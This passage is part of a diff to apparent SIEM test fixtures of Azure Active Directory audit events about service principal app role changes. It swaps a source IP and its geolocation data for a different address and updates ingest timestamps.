80-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -9023,25 +8249,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9055,7 +8263,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9191,7 +8399,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -9203,12 +8411,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036360900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125087Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -9234,25 +8442,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9266,7 +8456,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9402,7 +8592,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -9414,12 +8604,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036365700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125093800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePr